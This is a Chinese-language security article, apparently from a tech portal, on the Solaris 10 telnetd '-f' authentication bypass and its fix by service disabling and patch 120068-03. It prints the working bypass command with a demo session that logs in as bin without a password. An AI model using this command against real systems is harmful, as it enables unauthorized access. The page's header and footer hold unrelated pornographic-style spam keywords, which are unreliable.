成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

聽高手談telnet安全漏洞

作者:佚名
網絡 網絡管理
telnet安全漏洞的問題如何解決呢?首先我們來了解一下目前telnet安全漏洞的情況,然后再看看高手是如何處理的。

telnet安全問題一直是我們重點關注的問題。那么今天我們就來討論一下telnet安全漏洞的內容。那么來了解一下telnet安全漏洞的基本情況。早期Solaris 2.6、7 和 8 的 telnetd存在一個漏洞, 可以通過/bin/login的環境變數 TTYPROMPT 繞過驗證,導致無需身份認證即可登錄。最近,Solaris 10的telnet又被發現出現了漏洞,Sun也及時推出了補丁。

我們先來看問題的癥狀。漏洞出現的系統環境為Solaris 10及以后版本,安裝時沒有選擇默認安裝。漏洞表現為通過在Solaris的telnet命令的-l選項后指定任意一個“-fusername”參數,就可以直接登錄進入Solaris系統。

命令格式:

  1. telnet -l "-fbin" target_address 

下面是通過telnet安全漏洞以bin用戶登錄系統的演示。

  1. # telnet -l "-fbin" myhost  
  2. Trying 172.21.60.120...  
  3. Connected to myhost.  
  4. Escape character is '^]'.  
  5. Sun Microsystems Inc.  SunOS 5.10 Generic January 2005  
  6. $ id -a  
  7. uid=2(bin) gid=2(bin) groups=2(bin),3(sys) 

如果管理員修改了/etc/default/login文件,在注釋掉CONSOLE行允許root遠程登錄的情況下,訪問者可以利用該漏洞直接以root登錄系統,這樣對系統危害更大。

Kingcope最早給出了在OpenSolaris中發現的該漏洞的源代碼,并稱其為“0day”-零日漏洞。文章地址為:http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf

該文章中提供一個腳本,運行后用戶可以獲得被登錄系統的adm用戶權限。

解決方法:

1. 禁止Solaris 10的telnet服務。

檢查本機的telnet服務是否啟動。

  1. # svccfg list | grep telnet  
  2. network/telnet  
  3. # svcs -l network/telnet  
  4. fmri svc:/network/telnet:default  
  5. name Telnet server  
  6. enabled true  
  7. stateonline  
  8. next_state  none  
  9. state_time  Mon Feb 26 03:50:13 2007  
  10. restartersvc:/network/inetd:default 

禁止telnet服務。

  1. # svcadm disable svc:/network/telnet:default 

2. 下載安裝Sun的安全補?。ㄐ鑃un服務支持)。

Sun的技術支持工程師Alan Hargreaves在他2月13日的BLOG:http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit

中提到,最終解決該問題的補丁120068-03已經發布。通過Solaris 10的Update Manager可以下載安裝該補丁,如圖所示。這里可以看到該補丁是2月21日發布的。

telnet漏洞

需要說明的是Solaris 10的補丁,除了Security和hardware相關補丁可以免費下載,其它都是要服務支持的,就是Sun Service Plan。但是對于知道Patch號的,可以從http://sunsolve.sun.com中單個下載。這里可以在sunsolve上用PatchFinder查找120068-03補丁并下載,安裝到系統中。

安裝補丁后系統漏洞被禁止。

  1. # showrev -p | grep 120068  
  2. Patch: 120068-01 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd  
  3. Patch: 120068-03 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd  
  4. # telnet -l "-fbin" myhost  
  5. Trying 172.21.60.120...  
  6. Connected to myhost.  
  7. Escape character is '^]'.  
  8. Password: 

需要用戶輸入密碼登錄,可見當前Solaris 10系統的telnet安全漏洞被修正。

對新發現的Solaris 10的telnet安全漏洞,Sun的反應還算迅速,立刻推出了相應補丁程序。這里也可以看見,任何操作系統都是有Bug存在的,Sun通過OpenSolaris開源,使得系統的bug能盡快被發現和完善。

責任編輯:佟健 來源: 網絡整理
telnet安全漏洞
相關推薦

2010-07-26 15:37:12

telnet安全漏洞

2009-11-17 10:20:01

Oracle Spat

2014-06-03 11:36:18

2014-06-03 09:23:41

2010-03-05 15:46:05

2023-12-31 09:06:08

2022-07-06 11:50:43

漏洞網絡攻擊

2024-06-07 15:26:22

2020-10-09 09:52:00

漏洞分析

2009-03-07 09:59:16

2021-05-12 10:46:23

漏洞BINDDNS服務器

2011-12-26 11:22:48

2010-03-25 17:31:16

2010-12-13 12:35:56

職場

2009-11-02 18:56:49

調整Oracle數據庫

2009-12-07 09:55:12

2010-09-07 14:19:29

2011-09-28 10:25:23

2012-07-31 09:22:23

2012-05-22 20:46:57

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 日本成人福利视频 | 亚洲一区免费 | 日韩精品一区二区久久 | 国产精品3区| 日本亚洲一区二区 | 精品国产免费人成在线观看 | 国产精品国产精品国产专区不片 | 国产高清精品在线 | 999久久久久久久久6666 | 蜜桃av鲁一鲁一鲁一鲁 | www日本高清视频 | 中文字幕人成乱码在线观看 | 欧美一区二区三区小说 | 亚洲天堂一区二区 | 玖玖视频国产 | 日韩国产中文字幕 | 91精品国产美女在线观看 | 丁香婷婷久久久综合精品国产 | 日本成人在线网址 | 日韩欧美大片 | 夜夜骑天天干 | 亚洲欧美日韩中文字幕一区二区三区 | 国产欧美一区二区精品久导航 | 久久人人爽人人爽 | 精品久久久久久久久久久久久久 | 国产精品一区二区免费 | 成人二区 | 少妇午夜一级艳片欧美精品 | 欧美成人免费在线视频 | 国产一区二区三区色淫影院 | 国产日韩一区二区三区 | 黄色a视频 | 91在线精品播放 | www.日韩 | 成人福利网站 | 亚洲成人精品免费 | 91看片在线| 自拍偷拍亚洲一区 | 福利精品 | 欧美aaaaa| 伊人久久综合 |